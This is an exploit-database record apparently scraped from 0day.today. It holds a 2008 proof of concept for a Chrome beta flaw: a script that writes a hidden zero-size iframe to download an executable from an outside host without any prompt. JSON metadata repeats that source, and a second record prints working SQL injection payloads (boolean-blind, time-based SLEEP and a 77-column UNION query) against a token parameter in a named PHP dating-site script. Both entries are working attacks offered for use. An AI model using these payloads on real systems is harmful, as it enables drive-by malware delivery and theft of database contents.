Google Chrome Browser 0.2.149.27 Automatic File Download Exploit
2008-09-03T00:00:00
ID 1337DAY-ID-9253 Type zdt Reporter nerex Modified 2008-09-03T00:00:00
Description
Exploit for unknown platform in category remote exploits
================================================================
Google Chrome Browser 0.2.149.27 Automatic File Download Exploit
================================================================
***************************************************************************
Author: nerex
E-mail: nerex[at]live[dot]com
Google's new Web browser (Chrome) allows files (e.g., executables) to be automatically
downloaded to the user's computer without any user prompt.
This proof-of-concept was created for educational purposes only.
Use the code it at your own risk.
The author will not be responsible for any damages.
Tested on Windows Vista SP1 and Windows XP SP3 with Google Chrome (BETA)
**************************************************************************
<script>
document.write('<iframe src="http://www.example.com/hello.exe" frameborder="0" width="0" height="0">');
</script>
# 0day.today [2018-04-04] #
{"id": "1337DAY-ID-9253", "bulletinFamily": "exploit", "title": "Google Chrome Browser 0.2.149.27 Automatic File Download Exploit", "description": "Exploit for unknown platform in category remote exploits", "published": "2008-09-03T00:00:00", "modified": "2008-09-03T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://0day.today/exploit/description/9253", "reporter": "nerex", "references": [], "cvelist": [], "type": "zdt", "lastseen": "2018-04-04T23:34:38", "history": [{"bulletin": {"bulletinFamily": "exploit", "cvelist": [], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Exploit for unknown platform in category remote exploits", "edition": 1, "enchantments": {"score": {"modified": "2016-04-20T00:59:44", "value": 8.3, "vector": "AV:N/AC:L/Au:M/C:C/I:C/A:C/"}}, "hash": "495f075a38b0a37bc0a39cf03a84187686e7e37738617ec27a02fcfc2db960e7", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "6033486867bc084d932ec078839d8a59", "key": "modified"}, {"hash": "2dddf006980f818680da5e94d0abc5be", "key": "reporter"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "26eaccdd331be5f31aff43ce579267b9", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "bd16d4074fa52bf60a9858e35abbccab", "key": "title"}, {"hash": "05b4827de327a8b959f5db7337cee3e8", "key": "sourceHref"}, {"hash": "718313240a8bb42c30ac95f752cf889e", "key": "sourceData"}, {"hash": "6033486867bc084d932ec078839d8a59", "key": "published"}, {"hash": "37e5d5b6ac3ce6fb6d3a6ab0f49b2bf0", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}], "history": [], "href": "http://0day.today/exploit/description/9253", "id": "1337DAY-ID-9253", "lastseen": "2016-04-20T00:59:44", "modified": "2008-09-03T00:00:00", "objectVersion": "1.0", "published": "2008-09-03T00:00:00", "references": [], "reporter": "nerex", "sourceData": "================================================================\r\nGoogle Chrome Browser 0.2.149.27 Automatic File Download Exploit\r\n================================================================\r\n\r\n\r\n\r\n***************************************************************************\r\n Author: nerex\r\n E-mail: nerex[at]live[dot]com\r\n\r\n Google's new Web browser (Chrome) allows files (e.g., executables) to be automatically\r\n downloaded to the user's computer without any user prompt.\r\n\r\n This proof-of-concept was created for educational purposes only.\r\n Use the code it at your own risk.\r\n The author will not be responsible for any damages.\r\n\r\n Tested on Windows Vista SP1 and Windows XP SP3 with Google Chrome (BETA)\r\n**************************************************************************\r\n<script>\r\ndocument.write('<iframe src=\"http://www.example.com/hello.exe\" frameborder=\"0\" width=\"0\" height=\"0\">');\r\n</script>\r\n\r\n\r\n\n# 0day.today [2016-04-20] #", "sourceHref": "http://0day.today/exploit/9253", "title": "Google Chrome Browser 0.2.149.27 Automatic File Download Exploit", "type": "zdt", "viewCount": 0}, "differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-20T00:59:44"}], "edition": 2, "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "37e5d5b6ac3ce6fb6d3a6ab0f49b2bf0"}, {"key": "href", "hash": "3940876d30b3b5151df658597accc8e3"}, {"key": "modified", "hash": "6033486867bc084d932ec078839d8a59"}, {"key": "published", "hash": "6033486867bc084d932ec078839d8a59"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "2dddf006980f818680da5e94d0abc5be"}, {"key": "sourceData", "hash": "d218818e8f7d282aaf30b9e771d1ef87"}, {"key": "sourceHref", "hash": "e1df80d3e52647f8e03beadb910c2c7e"}, {"key": "title", "hash": "bd16d4074fa52bf60a9858e35abbccab"}, {"key": "type", "hash": "0678144464852bba10aa2eddf3783f0a"}], "hash": "9ba62e64e9f71d34bcbf44addb6582241fb3e3f09209e07003c89d15cedecc62", "viewCount": 0, "enchantments": {"vulnersScore": 9.3}, "objectVersion": "1.3", "sourceHref": "https://0day.today/exploit/9253", "sourceData": "================================================================\r\nGoogle Chrome Browser 0.2.149.27 Automatic File Download Exploit\r\n================================================================\r\n\r\n\r\n\r\n***************************************************************************\r\n Author: nerex\r\n E-mail: nerex[at]live[dot]com\r\n\r\n Google's new Web browser (Chrome) allows files (e.g., executables) to be automatically\r\n downloaded to the user's computer without any user prompt.\r\n\r\n This proof-of-concept was created for educational purposes only.\r\n Use the code it at your own risk.\r\n The author will not be responsible for any damages.\r\n\r\n Tested on Windows Vista SP1 and Windows XP SP3 with Google Chrome (BETA)\r\n**************************************************************************\r\n<script>\r\ndocument.write('<iframe src=\"http://www.example.com/hello.exe\" frameborder=\"0\" width=\"0\" height=\"0\">');\r\n</script>\r\n\r\n\r\n\n# 0day.today [2018-04-04] #"}
{"result": {"zdt": [{"lastseen": "2018-03-19T09:15:46", "references": [], "description": "Exploit for php platform in category web applications", "edition": 1, "reporter": "Dan\u00b0", "published": "2017-12-05T00:00:00", "title": "FS Shaadi Clone - SQL Injection Vulnerability", "type": "zdt", "enchantments": {"score": {"modified": "2018-03-19T09:15:46", "vector": "AV:N/AC:M/Au:M/C:N/I:N/A:P/", "value": 2.8}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2017-12-05T00:00:00", "id": "1337DAY-ID-29115", "href": "https://0day.today/exploit/description/29115", "sourceData": "# Exploit Title: FS Shaadi Clone - SQL Injection\r\n# Date: 2017-12-05\r\n# Exploit Author: Dan\u00b0\r\n# Vendor Homepage: https://fortunescripts.com/\r\n# Software Link: https://fortunescripts.com/product/shaadi-clone/\r\n# Version: 2017-12-05\r\n# Tested on: Kali Linux 2.0\r\n\r\n(PoC):\r\nSQL Injection on GET parameter = token\r\nhttp://localhost/view_profile.php?token=\r\n\r\n---\r\nParameter: token (GET)\r\n Type: boolean-based blind\r\n Title: AND boolean-based blind - WHERE or HAVING clause\r\n Payload: token=2060a87ff679a2f3e71d9181a67b7542122c' AND 9253=9253-- Eqjw\r\n\r\n Type: AND/OR time-based blind\r\n Title: MySQL >= 5.0.12 AND time-based blind\r\n Payload: token=2060a87ff679a2f3e71d9181a67b7542122c' AND SLEEP(5)-- aVZf\r\n\r\n Type: UNION query\r\n Title: Generic UNION query (NULL) - 77 columns\r\n Payload: token=-5886' UNION ALL SELECT NULL,CONCAT(0x7162787171,0x6153755a46504d6a546578714d765a594a5359556c414f4d736c45444958686e4455564770526272,0x7170787071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- nVKG\r\n---\r\n\n\n# 0day.today [2018-03-19] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/29115"}]}}